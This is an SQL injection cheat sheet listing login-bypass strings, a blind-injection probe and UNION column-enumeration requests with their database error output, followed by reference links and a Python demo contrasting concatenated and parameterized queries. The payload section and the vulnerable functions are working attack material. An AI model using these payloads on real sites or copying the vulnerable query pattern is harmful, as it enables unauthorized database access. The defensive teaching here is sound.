~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                  SQL INJECTION
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

101 OR 1=1        -> 101 is real data    <- Integer SQL Injection
' or 'a'='a                              <- String SQL Injection
'or 1=1--
"or 1=1--
or1=1--
" or "a"="a
') or ('a'='a
admin--
'having 1=1--

[Blind SQL Injection]
101 AND (asc( mid((SELECT first_name FROM user_data WHERE userid=15613) , 2 , 1) ) > 109 );

Examples:
--------
SQL Injection in feed.php:
    feed.php?folder=3 and 1=1 UNION select title from item--

with magic_quotes=off:
SQL Injection in search.php:
    search.php?rss_query=aa%')) UNION select null,null,null,null,null,null,null,null,null,null,null,title,null from item-- &rss_query_match=exact

Login: 'union select 0,0,0,0 from admin/*
Login: 'union select 1,'user',md5('asasa'),whateveritis from admin/*

#http://target/[path]/detail.asp?ID='=[SQL]
#http://target/[path]/listings.asp?itemID=[SQL]

Getting Table Names:
-------------------
> http://vuln/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5

> http://vuln/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5

> http://vuln/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
www.hackcraft.com

==========
REFERENCES:
http://www.plus.or.kr/wikix/index.php?display=Web+05Sum (GOOD WIKI)
==========

1 : override   phpBB
    * phpbb_vulnerabilities.ppt

2 : imiro      wiki
    * Wiki Vulnerabilities.ppt
      o MoinMoin : http://moinmoin.wikiwikiweb.de/
      o wikix : http://wikix.sourceforge.net/
      o securityfocus : http://www.securityfocus.com/

freestar?      URL Encoded Attack
    * URL Encoded Attacks.ppt
    * Reference : http://www.technicalinfo.net/papers/URLEmbeddedAttacks.html
    * XSS_Concept.ppt
    * Reference : http://www.technicalinfo.net/papers/CSS.html

override       Web Based Session Management
    o Reference : http://www.technicalinfo.net/papers/WebBasedSessionManagement.html

dna            HTTP Response Splitting, Web Cache Poisoning Attacks
    o Reference : http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
    o Web_Cache_Poisoning_by_using_HTTP_Response_Splitting.ppt
      PPT: http://www.plus.or.kr/wikix/file/Web%2005Sum/Web%5FCache%5FPoisoning%5Fby%5Fusing%5FHTTP%5FResponse%5FSplitting.ppt
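Added example (not from the cheat sheet above or the hackcraft notes): the integer and string payloads listed in the SQL INJECTION section, run against a constructed in-memory SQLite table through a concatenated query and then through a parameterized one, so the defect and the fix can be seen side by side. The table name and rows are assumptions for the demo.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory sample table (not from the original page)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE user_data (userid INTEGER, first_name TEXT, password TEXT)")
    con.executemany("INSERT INTO user_data VALUES (?, ?, ?)",
                    [(101, "alice", "s3cret"), (15613, "bob", "hunter2")])
    return con


def login_vulnerable(con, user: str, pw: str) -> list:
    # String concatenation: a quote in the input closes the literal and the
    # rest of the input is parsed as SQL (the "String SQL Injection" case).
    sql = (f"SELECT first_name FROM user_data "
           f"WHERE first_name='{user}' AND password='{pw}'")
    return [row[0] for row in con.execute(sql)]


def login_safe(con, user: str, pw: str) -> list:
    # Bound parameters: values travel separately from the statement text,
    # so quotes and comment sequences in the input stay plain data.
    sql = "SELECT first_name FROM user_data WHERE first_name=? AND password=?"
    return [row[0] for row in con.execute(sql, (user, pw))]


def lookup_vulnerable(con, userid: str) -> list:
    # Numeric field spliced in unquoted: "101 OR 1=1" widens the WHERE clause
    # to every row (the "Integer SQL Injection" case).
    return [row[0] for row in con.execute(
        f"SELECT first_name FROM user_data WHERE userid={userid}")]


def lookup_safe(con, userid: str) -> list:
    # Validate the type at the trust boundary, then bind the integer.
    uid = int(userid)  # raises ValueError for "101 OR 1=1"
    return [row[0] for row in con.execute(
        "SELECT first_name FROM user_data WHERE userid=?", (uid,))]


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "' or 'a'='a", "' or 'a'='a"))  # ['alice', 'bob']
    print(login_safe(db, "' or 'a'='a", "' or 'a'='a"))        # []
    print(lookup_vulnerable(db, "101 OR 1=1"))                 # ['alice', 'bob']
    print(lookup_safe(db, "101"))                              # ['alice']
```

The column-name enumeration in the "Getting Table Names" section works only because the raw ODBC conversion error is returned to the client; binding parameters closes the injection itself, and a generic error page removes the oracle that turns it into data leakage.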